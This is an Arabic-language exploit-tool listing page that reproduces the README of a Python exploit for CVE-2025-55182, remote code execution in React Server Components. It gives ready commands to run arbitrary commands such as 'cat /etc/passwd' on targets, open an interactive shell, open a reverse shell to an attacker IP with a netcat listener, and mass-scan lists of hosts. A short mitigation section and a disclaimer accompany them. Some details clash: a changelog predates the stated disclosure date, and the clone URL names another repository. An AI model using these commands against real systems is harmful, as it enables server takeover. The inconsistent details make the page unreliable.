Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182_liyon — استغلال قائم على Python لـ CVE-2025-55182 (RCE في React Server Components) مع قشرة تفاعلية وقشرة عكسية وفحص دفعة وبيئة ضعيفة قائمة على Docker لاختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
أداة الوصول عن بعد
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

استغلال قائم على Python لـ CVE-2025-55182 (RCE في React Server Components) مع قشرة تفاعلية وقشرة عكسية وفحص دفعة وبيئة ضعيفة قائمة على Docker لاختبار الأمان المصرح به.

عرض المستودع
3منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 - تنفيذ التعليمات البرمجية عن بُعد في مكونات خادم React

⚠️ إخلاء مسؤولية قانوني: هذه الأداة مخصصة لأغراض البحث الأمني واختبار الاختراق المصرح به والتعليم فقط. استخدام هذه الأداة ضد أي نظام دون إذن صريح هو غير قانوني وغير أخلاقي.

📋 نظرة عامة

CVE-2025-55182 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في مكونات خادم React (RSC)، تسمح لمهاجم غير مصادق عليه بتنفيذ تعليمات برمجية عشوائية على الخادم من خلال إلغاء تسلسل ضار لكائنات JavaScript.

🎯 تفاصيل الثغرة

الخاصيةالقيمة
معرف CVECVE-2025-55182
درجة CVSS9.8 (حرجة)
متجه الهجومشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
التأثيرعالي (السرية، التكامل، التوفر)
المكون المتأثرمكونات خادم React (RSC)
الإصدارات المتأثرةReact 18.x - 19.x (إصدارات بناء محددة)
تاريخ الإفصاح3 ديسمبر 2025
اسم مستعار لـ CVEReact2Shell

🔍 تفاصيل تقنية

السبب الجذري: تقوم مكونات خادم React بإلغاء تسلسل كائنات JavaScript المقدمة من المستخدم بشكل غير صحيح عند معالجة حمولات RSC، مما يسمح للمهاجم بحقن تعليمات برمجية ضارة يتم تنفيذها على الخادم.

متجه الهجوم: حمولات RSC ضارة في طلبات HTTP التأثير: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة، السيطرة على الخادم، تسرب البيانات

🚀 الميزات

  • ✅ أداة استغلال أحادية الملف بلغة Python مع قشرة تفاعلية
  • ✅ كشف تلقائي للثغرة
  • ✅ فحص جماعي متعدد الخيوط
  • ✅ بيئة React ضعيفة قائمة على Docker
  • ✅ دعم أنواع متعددة من الحمولات
  • ✅ تسجيل مفصل ومعالجة الأخطاء
  • ✅ إنشاء قشرة عكسية
  • ✅ تشفير الحمولة باستخدام Base64

📦 التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# تثبيت التبعيات
pip install -r requirements.txt

🎯 طريقة الاستخدام

بداية سريعة

root@kitploit:~
# تثبيت التبعيات
pip install requests

# تنفيذ أمر على الهدف الضعيف
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# وضع القشرة التفاعلية
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

خيارات متقدمة

root@kitploit:~
# أمر مخصص
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# إنشاء قشرة عكسية باستخدام IP/Port مخصص
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# فحص جماعي
python exploit/batch_scanner.py -f targets.txt

# وضع التفصيل
python exploit/cve_2025_55182.py -u http://target.com -v

# User-Agent مخصص
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ إعداد البيئة المستهدفة

باستخدام Docker (موصى به)

root@kitploit:~
cd target
docker-compose up -d

الإعداد اليدوي

root@kitploit:~
cd target
npm install
npm run dev

الوصول إلى التطبيق الضعيف: http://localhost:3000

📊 سيناريوهات الهجوم

السيناريو 1: تنفيذ أمر

تنفيذ أمر واحد على الخادم الضعيف:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

المخرجات المتوقعة:

root@kitploit:~
[+] تم الكشف عن الثغرة بنجاح: React Server Components RCE
[+] تنفيذ الأمر: id
[+] الرد:
uid=0(root) gid=0(root) groups=0(root)

السيناريو 2: قشرة تفاعلية

الحصول على قشرة تفاعلية على الخادم الضعيف:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

الميزات:

  • إكمال علامات التبويب (Tab)
  • تاريخ الأوامر
  • جلسات قشرة متعددة
  • رفع/تنزيل الملفات

السيناريو 3: قشرة عكسية

إنشاء اتصال قشرة عكسية:

root@kitploit:~
# على جهاز المهاجم
nc -lvnp 4444

# تشغيل أداة الاستغلال
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

السيناريو 4: فحص جماعي

فحص أهداف متعددة بحثًا عن الثغرة:

root@kitploit:~
# إنشاء ملف الأهداف
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# تشغيل الفاحص الجماعي
python exploit/batch_scanner.py -f targets.txt

🛡️ التخفيف والدفاع

إجراءات فورية

  1. تحديث React

    root@kitploit:~
    npm install react@latest
    # الترقية إلى الإصدار المصحح
    
  2. حظر طلبات RSC

    root@kitploit:~
    // تعطيل RSC مؤقتًا
    const config = {
      enableRSC: false
    }
    
  3. قواعد WAF

    • حظر الطلبات التي تحتوي على أنماط RSC
    • مراقبة الحمولات المشبوهة من JavaScript
    • فرض حدود معدل الوصول (rate limiting) على نقاط نهاية RSC

إصلاح طويل الأمد

  • تنفيذ التحقق من صحة الإدخال لحمولات RSC
  • استخدام بيئة تنفيذ JavaScript معزولة (sandbox)
  • إجراء تدقيق أمني دوري
  • مراقبة الوصول غير المصرح به إلى RSC

📚 الوثائق

  • تحليل الثغرة - تحليل تقني متعمق
  • دليل الاستخدام - تعليمات الاستخدام الكاملة
  • الدفاع والإصلاح - تعزيز الأمان

🧪 الاختبار

الاختبار اليدوي

root@kitploit:~
# إعداد البيئة الضعيفة
cd target && docker-compose up -d

# اختبار الثغرة
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

الاختبار الآلي

root@kitploit:~
# تشغيل مجموعة الاختبارات
python tests/test_exploit.py

🔬 مراجع بحثية

  • إدخال CVE-2025-55182 في NVD
  • إعلان أمان React
  • مدونة Wiz البحثية
  • تحليل Project Zero

📝 سجل التحديثات

v1.0.0 (2025-04-02)

  • الإصدار الأولي
  • استغلال RCE لأهداف مفردة
  • وضع القشرة التفاعلية
  • دعم القشرة العكسية
  • الفحص الجماعي
  • بيئة ضعيفة قائمة على Docker
  • وثائق شاملة

🎓 للأغراض التعليمية

توضح هذه الأداة:

  • كيفية عمل ثغرات RCE في React
  • ممارسات تطوير الاستغلال الصحيحة
  • منهجيات التقييم الأمني
  • مبادئ الاختراق الأخلاقي

👥 المساهمون

  • باحث أمني - التنفيذ الأولي

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للحصول على التفاصيل.

⚠️ إخلاء المسؤولية القانوني والأخلاقي

هام: هذه الأداة مخصصة فقط لأغراض الاختبارات الأمنية التعليمية والمصرح بها.

المتطلبات القانونية

  • استخدم الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح باختبارها
  • الامتثال لجميع القوانين واللوائح المعمول بها
  • أبلغ البائعين عن الثغرات بشكل مسؤول
  • اتبع إرشادات الإفصاح المسؤول

السلوكيات المحظورة

  • الوصول غير المصرح به إلى أنظمة الكمبيوتر
  • استهداف الأنظمة دون إذن
  • استخدام الثغرات لأغراض ضارة
  • تسريب أو تدمير البيانات

العواقب القانونية

  • تهم جنائية بسبب الوصول غير المصرح به
  • مسؤولية مدنية عن الأضرار
  • عقوبة السجن المحتملة
  • عواقب مهنية

باستخدام هذه الأداة، أنت توافق على:

  • الامتثال لجميع القوانين المحلية والدولية
  • استخدامها فقط في اختبارات الأمن المصرح بها
  • الإبلاغ المسؤول عن أي ثغرات يتم اكتشافها
  • عدم استخدامها في أنشطة ضارة أو غير قانونية

📞 الإبلاغ عن الثغرات

إذا وجدت هذه الثغرة في أنظمة إنتاج:

  1. الإبلاغ للبائع

    • فريق React: [email protected]
    • اتبع الإفصاح المسؤول
  2. تخصيص CVE

    • الإرسال إلى NIST NVD
    • اتبع الجدول الزمني للإفصاح
  3. المجتمع الأمني

    • شارك النتائج (بعد التصحيح)
    • أسهم في المعرفة الأمنية

تذكر: يجب أن يكون البحث الأمني دائمًا أخلاقيًا وقانونيًا. استخدم مهاراتك لجعل الإنترنت أكثر أمانًا! 🛡️

تنزيل الأداة